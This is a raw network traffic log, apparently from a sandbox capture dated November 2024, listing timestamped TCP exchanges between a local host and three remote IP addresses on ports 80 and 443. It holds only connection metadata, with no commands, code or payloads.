                                                                                                                                                                                Nov 25, 2024 14:06:37.749433041 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.751199961 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.751276016 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.751291990 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.751338959 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.756582975 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.756642103 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.756764889 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.756813049 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.762059927 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.762156963 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.762177944 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.762214899 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.767518044 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.767589092 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.767623901 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.767667055 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.773166895 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.773225069 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.773361921 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.773401976 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.778403997 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.778470039 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.778506041 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.778541088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.783780098 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.783814907 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.784013033 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.784060955 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.784128904 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.784164906 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.789367914 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.789426088 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.789474964 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.789520979 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.795001030 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.795073986 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.795099974 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.795164108 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.800339937 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.800405979 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.800442934 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.800482035 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.805840969 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.805901051 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.805905104 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.805944920 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.811882019 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:37.811947107 CET4916280192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:37.811949015 CET8049162172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.356033087 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.356053114 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.359653950 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.359716892 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.359749079 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.359788895 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.360970974 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.363297939 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.363359928 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.363461018 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.363502026 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.367067099 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.367127895 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.367151976 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.367188931 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.370654106 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.370707989 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.370790958 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.370827913 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.374294043 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.374340057 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.374363899 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.374397039 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.377984047 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.378036976 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.378072977 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.378104925 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.381679058 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.381731987 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.381933928 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.381975889 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.385339975 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.385385990 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.385410070 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.385445118 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.389029980 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.389205933 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.518650055 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.518748999 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.518759012 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.518784046 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.520402908 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.520416021 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.520462036 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.522820950 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.522875071 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.522936106 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.522974968 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.526084900 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.526155949 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.526209116 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.526254892 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.529570103 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.529630899 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.529660940 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.529701948 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.532989025 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.533052921 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.533087015 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.533123016 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.536067963 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.536125898 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.536377907 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.536422968 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.539338112 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.539391994 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.539459944 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.539494991 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.542614937 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.542665958 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.542678118 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.542699099 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:42.545929909 CET8049164172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:42.545988083 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:45.969572067 CET4916480192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:48.479926109 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:48.600528955 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:48.600703001 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:48.600948095 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:48.725245953 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776225090 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776268959 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776281118 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776281118 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.776321888 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.776381016 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776401997 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776415110 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776427984 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776432991 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.776436090 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776451111 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776458025 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.776463985 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.776484013 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.776499033 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.790442944 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.896557093 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.896750927 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.896812916 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.896869898 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.900772095 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.904741049 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.976532936 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.976629019 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.976648092 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.976700068 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.980809927 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.980869055 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.980910063 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.980959892 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:49.989195108 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:49.989250898 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.392755032 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.396277905 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.396332026 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.397206068 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.397258043 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.399920940 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.399974108 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.400161028 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.400202990 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.403774023 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.403785944 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.403825045 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.407063007 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.407123089 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.407166958 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.407207012 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.410657883 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.410722971 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.410756111 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.410794973 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.413963079 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.414038897 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.414055109 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.414088011 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.417377949 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.417448997 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.417455912 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.417495012 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.420785904 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.420849085 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.420922995 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.420959949 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.424211025 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.424293041 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.424329042 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.424371958 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.427645922 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.427699089 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.427699089 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.427741051 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.429501057 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.429559946 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.429564953 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.429603100 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.431355953 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.431401968 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.431586981 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.431624889 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:50.433518887 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:50.433582067 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:54.783381939 CET8049165172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:54.783447981 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:54.972381115 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.972436905 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:54.972485065 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.973227024 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:54.973241091 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.341204882 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.341311932 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.345134020 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.345151901 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.357750893 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.357774973 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851505041 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851578951 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.851598024 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:56.851645947 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.852317095 CET49166443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:56.852334976 CET44349166198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.131335974 CET4916580192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.299994946 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.421709061 CET8049167172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.424722910 CET4916780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:06:58.865112066 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.865185022 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.865242004 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.869066954 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.869112968 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.869169950 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.871805906 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.871845007 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.871999025 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.878789902 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:06:58.878832102 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.899297953 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.899331093 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:06:58.899827003 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:06:58.899849892 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313244104 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313383102 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.313837051 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.313924074 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.355925083 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.355951071 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.356360912 CET44349169198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.356411934 CET49169443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.365066051 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.365093946 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.365621090 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.365686893 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.719177961 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.719362974 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.722242117 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:00.727035999 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.727119923 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.727549076 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.767326117 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:00.856273890 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:00.899341106 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.119707108 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.119926929 CET44349170198.244.140.41192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:01.120065928 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:01.121316910 CET49170443192.168.2.22198.244.140.41
                                                                                                                                                                                Nov 25, 2024 14:07:02.104192019 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.104243994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.104255915 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112508059 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112541914 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112565994 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.112598896 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.112643003 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.118753910 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.118763924 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.118814945 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.118848085 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.123976946 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.124033928 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.124049902 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.124064922 CET49168443192.168.2.22193.30.119.205
                                                                                                                                                                                Nov 25, 2024 14:07:02.128160954 CET44349168193.30.119.205192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:02.128215075 CET49168443192.168.2.22193.30.119.205
